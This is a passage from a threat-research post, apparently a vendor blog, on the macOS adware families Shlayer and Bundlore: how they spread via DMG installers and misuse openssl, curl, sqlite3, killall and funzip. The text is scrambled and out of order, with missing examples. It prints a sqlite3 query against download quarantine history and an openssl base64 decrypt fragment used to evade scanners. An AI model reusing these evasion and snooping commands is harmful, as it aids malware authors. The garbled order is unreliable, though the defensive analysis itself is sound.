![]() ![]() The malicious binaries use funzip to extract the malicious binary with a password and using head or tail commands in the format as shown below: Sqlite3 /Users//Library/Preferences/2 select LSQuarantineDataURLString from LSQuarantineEvent where LSQuarantineDataURLString like “%s3.%” order by LSQuarantineTimeStamp desc limit 5 Funzipįunzip is a macOS utility that extracts a ZIP or gzip file directly to output from archives or other piped input. The malicious binaries use sqlite to get the history of downloaded files from internet in the format as shown below: SQLite is a transactional SQL database engine present in macOS generally used to create databases that can be transported across machines. The malicious binaries use this command to kill the script running from the terminal in the format as shown below: Killall is used to kill the processes specified by command or pattern match. We have observed malicious binaries use curl in the format as shown below: Openssl enc -aes-256-cbc -d -A -base64 -pass pass: CurlĬurl is a macOS command-line tool (curl) used for transferring data using various network protocols. We have observed malicious binaries use openssl with base64, Advanced Encryption Standard (AES), CBC (Cipher Block Chaining) to thwart security scanners in the format as shown below: The openssl program is a command line tool in macOS for using the various cryptography functions (SSL, TLS) of OpenSSL’s crypto library from the shell. The working and usage of these utilities in the attack killchain is described below. The prevalence of usage of these binaries in our daily incoming samples from the threat intelligence systems and customer telemetry for the past quarter is shown below (see Figure 3).įigure 3: macOS utilities leveraged by Shlayer and Bundlore Most variants of them are known to commonly leverage at least 3 of the 5 built-in macOS commands and utilities: openssl, curl, sqlite3, killall and funzip. Shlayer and Bundlore binaries use several macOS utilities in their attack kill chain. ![]() Upon installation, the malware bombards the victims machine with ads, and also intercepts browser searches in order to modify the search results to promote more ads. The bash files download the second-stage adware payload which lures the victim to generally install a fake version of flash player as shown below (see Figure 2). An example of one such DMG file with bash scripts is shown below (see Figure 1).įigure 1: DMG file initiating bash script installation The bash script is either a single file or a group of files pointing to the main bash script. Upon installation, the disk image mounts thereby initiating the bash shell script installation. The installers are usually macOS disk image files (DMG) that are distributed via compromised Google search results or downloaded from websites with poor reputation (like cracks, keygens). The malicious shell scripts used by Shlayer and Bundlore are usually malvertising-focused adware bundlers using shell scripts in the kill chain to download and install an adware payload. Shlayer and Bundlore – malicious Shell scripts We will also discuss the inbuilt macOS utilities leveraged by these malwares and showcase the Uptycs EDR detection capabilities. In this post, we will showcase the different variants of malicious shell scripts used in Shlayer and Bundlore that have been constantly in the rounds. These malware are the most predominant malware in macOS, also with a history of evading and bypassing the built-in Xprotect, Gatekeeper, Notarization and File Quarantine security features of macOS. Though these scripts have slight variations, they mostly belong to a plague of adware strains- Shlayer and Bundlore. The Uptycs threat research team has been observing over 90% of macOS malware in our daily analysis and customer telemetry alerts using shell scripts. Uptycs threat research team analyzed macOS malware threat landscape and discovered that Shlayer and Bundlore are the most predominant malware.
0 Comments
Leave a Reply. |